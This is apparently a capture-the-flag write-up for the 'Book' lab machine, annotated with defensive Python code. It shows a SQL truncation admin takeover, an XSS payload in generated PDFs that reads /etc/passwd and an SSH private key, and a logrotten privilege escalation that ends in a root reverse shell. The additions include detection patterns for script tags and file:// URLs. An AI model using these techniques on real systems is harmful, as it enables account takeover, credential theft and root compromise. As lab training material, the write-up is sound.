Book - K3nX

  • Book is a medium-difficulty Linux machine; its IP address is 10.10.10.176.

    Nmap

    #nmap -sSV -O -A -T4 10.10.10.176
    Nmap scan report for 10.10.10.176
    Host is up (0.95s latency).
    Not shown: 998 closed ports
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    |   2048 f7:fc:57:99:f6:82:e0:03:d6:03:bc:09:43:01:55:b7 (RSA)
    |   256 a3:e5:d1:74:c4:8a:e8:c8:52:c7:17:83:4a:54:31:bd (ECDSA)
    |_  256 e3:62:68:72:e2:c0:ae:46:67:3d:cb:46:bf:69:b9:6a (ED25519)
    80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
    | http-cookie-flags:
    |   /:
    |     PHPSESSID:
    |_      httponly flag not set
    |_http-server-header: Apache/2.4.29 (Ubuntu)
    |_http-title: LIBRARY - Read | Learn | Have Fun
    No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
    TCP/IP fingerprint:
    OS:SCAN(V=7.80%E=4%D=4/26%OT=22%CT=1%CU=33576%PV=Y%DS=2%DC=T%G=Y%TM=5EA587D
    OS:E%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=109%TI=Z%CI=Z%II=I%TS=A)OPS
    OS:(O1=M54BST11NW7%O2=M54BST11NW7%O3=M54BNNT11NW7%O4=M54BST11NW7%O5=M54BST1
    OS:1NW7%O6=M54BST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN
    OS:(R=Y%DF=Y%T=40%W=FAF0%O=M54BNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
    OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
    OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
    OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
    OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
    OS:=S)
    
    Network Distance: 2 hops
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
    TRACEROUTE (using port 587/tcp)
    HOP RTT       ADDRESS
    1   805.67 ms 10.10.16.1
    2   396.16 ms 10.10.10.176
    
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 129.98 seconds
    
    

    The Nmap result shows only port 22 (SSH) and port 80 (Apache httpd) open.

    Web Enumeration

    • Since port 80 is open, I checked the website first. Browsing to it shows a library page, and trying to access its content brings up a sign-in form.
    • I used gobuster to look for directories. It found many, but nothing interesting.

    • Next I checked the page source and found one interesting detail.

    • It looks like there is a length limit on the name and email fields. I created an account to see the site from the inside and found several interesting parts; one of them is "Contact Us".

    • On this page I found the admin email: admin@book.htb

    • Earlier I noted the limit on the email field, so I suspected a SQL truncation attack might be possible.

      SQL Truncation

    • The SQL truncation attack relies on how the database server handles special characters such as trailing spaces. If you register with the email "admin@book.htb a" (notice the spaces and the fact that the email string length is less than 20), the application checks whether any user already has the email "admin@book.htb a". Nobody does, so the database truncates the submitted value to the 20-character maximum, drops the trailing spaces (MySQL behaviour) and saves a new entry with it, which then collides with the existing admin email.

    • This way you can easily change the admin user's password.

    • I set the admin user's password to admin.
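
    To make the mechanism concrete, here is an added Python model of the registration flow (illustrative code written for this page, not the Book application's source). It assumes the users table stores email as VARCHAR(20), that the app checks for an existing email before inserting, and that MySQL runs without STRICT_TRANS_TABLES; in the model the padded value is 21 characters so the column actually truncates it. The two fixes, strict sql_mode and server-side length validation, are shown beside the vulnerable path.

```python
EMAIL_WIDTH = 20  # VARCHAR(20): the form's 20-character email limit noted above

def pad_space_equal(a, b):
    # MySQL's PAD SPACE collations ignore trailing spaces when comparing, so
    # 'admin@book.htb' and 'admin@book.htb      ' compare as the same value.
    return a.rstrip(" ") == b.rstrip(" ")

def store_varchar(value, width, strict):
    # Non-strict sql_mode silently cuts anything past the column width. Strict
    # mode errors when non-space characters are cut (trailing spaces only warn).
    if strict and value[width:].strip(" "):
        raise ValueError("Data too long for column 'email'")
    return value[:width]

class Users:
    def __init__(self, strict_sql_mode, validate_length):
        self.rows = []                 # constructed in-memory stand-in for the table
        self.strict = strict_sql_mode
        self.validate = validate_length

    def register(self, email, password):
        # Hardened path: bound and normalise the input before the DB sees it.
        if self.validate and (len(email) > EMAIL_WIDTH or email != email.strip()):
            return False
        # Vulnerable pattern: the uniqueness check runs on the raw, untruncated
        # input, so a padded value with a junk character on the end never matches.
        if any(pad_space_equal(r["email"], email) for r in self.rows):
            return False
        self.rows.append({"email": store_varchar(email, EMAIL_WIDTH, self.strict),
                          "password": password})
        return True

    def login(self, email, password):
        # Every row matching the credentials: two rows means the admin's email
        # now also resolves to an attacker-chosen password.
        return [r for r in self.rows
                if pad_space_equal(r["email"], email) and r["password"] == password]

def demo(strict_sql_mode, validate_length):
    """Rows matched when logging in as admin@book.htb with the second password:
    1 means the truncation collision succeeded, 0 means it was stopped."""
    users = Users(strict_sql_mode, validate_length)
    users.register("admin@book.htb", "s3cret-original")
    padded = "admin@book.htb" + " " * 6 + "a"   # 21 chars: 'a' defeats the check
    try:                                        # and is what truncation drops
        users.register(padded, "attacker-chosen")
    except ValueError:
        pass                                    # strict mode refused the INSERT
    return len(users.login("admin@book.htb", "attacker-chosen"))
```

    With both protections off, demo() finds a second row for the admin email; enabling either strict sql_mode or the length check brings it back to zero.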

    • Now I have admin access.

    • I found one interesting part of the admin panel: Collection.

    • Those PDF links download a PDF named after the users or after the collections.

    • The PDF is created dynamically and we control part of its input, so this may allow server-side XSS (dynamic PDF generation).

    XSS to Local File Read (Server-Side XSS)
    • This is my payload:

      <script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///etc/passwd");x.send();</script>

    • Put the payload in both the book and author fields and select any file to upload.

    • After uploading, you can download the generated file from the Collection page of the admin panel.

    • The PDF I got back contained the contents of /etc/passwd.
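
    An added defensive counterpart (example code, not from the writeup or the Book application) showing how the book and author fields could be handled so that the payload above never reaches the PDF renderer as live markup: an allow-list check at upload time, HTML escaping in the template, and a pattern for auditing entries already stored. FIELD_MAX and the allow-list are my assumptions about what a title or author field should accept.

```python
import html
import re

# Constructed copy of the payload shown above, used here only as test input.
PAYLOAD = ('<script>x=new XMLHttpRequest;x.onload=function(){document.write('
           'this.responseText)};x.open("GET","file:///etc/passwd");x.send();</script>')

FIELD_MAX = 80                      # assumed upper bound for a title or author name
# Allow-list for the two fields: letters, digits, spaces and light punctuation.
# Angle brackets, quotes, parentheses and slashes, which the payload needs, are out.
ALLOWED = re.compile(r"^[\w .,'&:;!?-]{1,%d}$" % FIELD_MAX)
# Retro-audit pattern for rows already stored: a real title has none of these.
SUSPICIOUS = re.compile(r"<\s*(script|iframe|img|svg|object|embed)\b|file://|javascript:", re.I)

def validate_field(value):
    """Input check for the upload handler, run before anything is stored."""
    return bool(ALLOWED.fullmatch(value))

def render_collection_row(book, author):
    """Hardened template step. The vulnerable version concatenated the raw
    fields into the HTML handed to the PDF engine; escaping turns '<script>'
    into inert text before the engine ever sees it."""
    return "<tr><td>{}</td><td>{}</td></tr>".format(
        html.escape(book, quote=True), html.escape(author, quote=True))

def contains_markup(rendered):
    """Output check: nothing but the template's own table tags may survive."""
    tags = re.findall(r"<\s*/?\s*([a-zA-Z]+)", rendered)
    return any(t.lower() not in {"tr", "td"} for t in tags)

def flag_stored_submission(book, author):
    """Audit existing collection entries for script tags or local-file URLs."""
    return bool(SUSPICIOUS.search(book) or SUSPICIOUS.search(author))
```

    The allow-list is deliberately strict; loosen it per field if real titles need more punctuation, but keep angle brackets and quotes out and keep the escaping step regardless.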

    User

    • The user is reader, so the next thing to try is /home/reader/.ssh/id_rsa.

    • I replaced /etc/passwd with /home/reader/.ssh/id_rsa in the previous XSS payload.

    • After uploading again and downloading the PDF, I had reader's SSH key.

    • I logged in with this id_rsa, got the user shell and read user.txt.

    Privilege Escalation to root

    • I spent some time on this but could not find anything; then a friend suggested checking the running processes.

    • I uploaded pspy and watched the processes. I noticed logrotate running.

    • This logrotate job runs as root. I searched on Google and found an exploit for it on GitHub:

    • Logrotten
    • I used Python's simple HTTP server to transfer logrotten.c and nc to the box, then compiled logrotten.c with gcc.
    • Now run logrotten:
    • reader@book:/tmp$ ./logrotten -p ./payload /home/reader/backups/access.log
      
    • We then need to write into access.log so that the log gets rotated:
    • 
      reader@book:~/backups$ echo "test" >> access.log
      reader@book:~/backups$ echo "test" >> access.log
      reader@book:~/backups$ echo "test" >> access.log
      reader@book:~/backups$ echo "test" >> access.log
      reader@book:~/backups$ echo "test" >> access.log
      reader@book:~/backups$ echo "test" >> access.log
      reader@book:~/backups$ echo "test" >> access.log
      reader@book:~/backups$ echo "test" >> access.log
      reader@book:~/backups$ echo "test" >> access.log
      reader@book:~/backups$ echo "test" >> access.log
      reader@book:~/backups$ echo "test" >> access.log
      reader@book:~/backups$ echo "test" >> access.log
      reader@book:~/backups$ echo "test" >> access.log
      reader@book:~/backups$ echo "test" >> access.log
      reader@book:~/backups$ echo "test" >> access.log
      reader@book:~/backups$ echo "test" >> access.log
      reader@book:~/backups$ echo "test" >> access.log
      reader@book:~/backups$ echo "test" >> access.log
      
    • You may need to try this several times, running logrotten and writing into the access log.
    • After a few attempts, I got a shell on my ncat listener:
    • 
      [root@arch ~/Desktop/htb/Machines/book]# nc -lvnp 9001
      Ncat: Version 7.80 ( https://nmap.org/ncat )
      Ncat: Listening on :::9001
      Ncat: Listening on 0.0.0.0:9001
      connect to [10.10.16.5] from (UNKNOWN) [10.10.10.176] 50008
      # cat /root/.ssh/id_rsa
      
    • The first thing I did was grab root's id_rsa for SSH access.
    • With root's id_rsa in hand, I tried an SSH login with it.
    • The SSH login succeeded: root access and root.txt.
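
    As an added defensive check (not part of the writeup or of logrotten), here is a small Python audit that parses logrotate stanzas and flags the precondition used above: a log rotated by root out of a directory that a non-root user owns or can write to, with no su directive telling logrotate to perform the rotation as that user instead. The config and the directory ownership map below are constructed to mirror the /home/reader/backups/access.log setup.

```python
import re
import stat

# Constructed logrotate config shaped like the Book box: the first stanza is
# the page's /home/reader/backups/access.log, rotated by root's cron job; the
# second is a root-owned log with an 'su' line, for contrast.
SAMPLE_CONFIG = """\
/home/reader/backups/access.log {
    daily
    rotate 3
    create 0640 reader reader
    missingok
}
/var/log/cron.log {
    weekly
    su root adm
    rotate 4
}
"""
# Constructed stat results (owner uid, permission bits) for each parent directory.
SAMPLE_DIRS = {"/home/reader/backups": (1000, 0o755),   # owned by reader, not root
               "/var/log": (0, 0o755)}

def parse_logrotate(text):
    """Return (log_path, [directive lines]) for every stanza in the config."""
    stanzas = []
    for m in re.finditer(r"^\s*(\S+)\s*\{(.*?)^\s*\}", text, re.S | re.M):
        body = [ln.strip() for ln in m.group(2).splitlines() if ln.strip()]
        stanzas.append((m.group(1), body))
    return stanzas

def unsafe_stanzas(text, dir_stat):
    """Logs that root rotates out of a directory a non-root user owns or can
    write to, with no 'su' directive making logrotate switch to that user:
    the precondition the logrotten technique above needs."""
    findings = []
    for path, directives in parse_logrotate(text):
        parent = path.rsplit("/", 1)[0] or "/"
        uid, mode = dir_stat[parent]          # on a live host: os.stat(parent)
        has_su = any(d.split()[0] == "su" for d in directives)
        user_controlled = uid != 0 or mode & (stat.S_IWGRP | stat.S_IWOTH)
        if user_controlled and not has_su:
            findings.append(path)
    return findings
```

    On a real host, build dir_stat from os.stat of each log's parent directory and feed the function /etc/logrotate.conf plus each file under /etc/logrotate.d; adding "su reader reader" to the flagged stanza, or moving the log to a root-owned directory, clears the finding.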
    • Finally, owned this machine.
    • I hope you enjoyed this.
    • Hope you learned something :)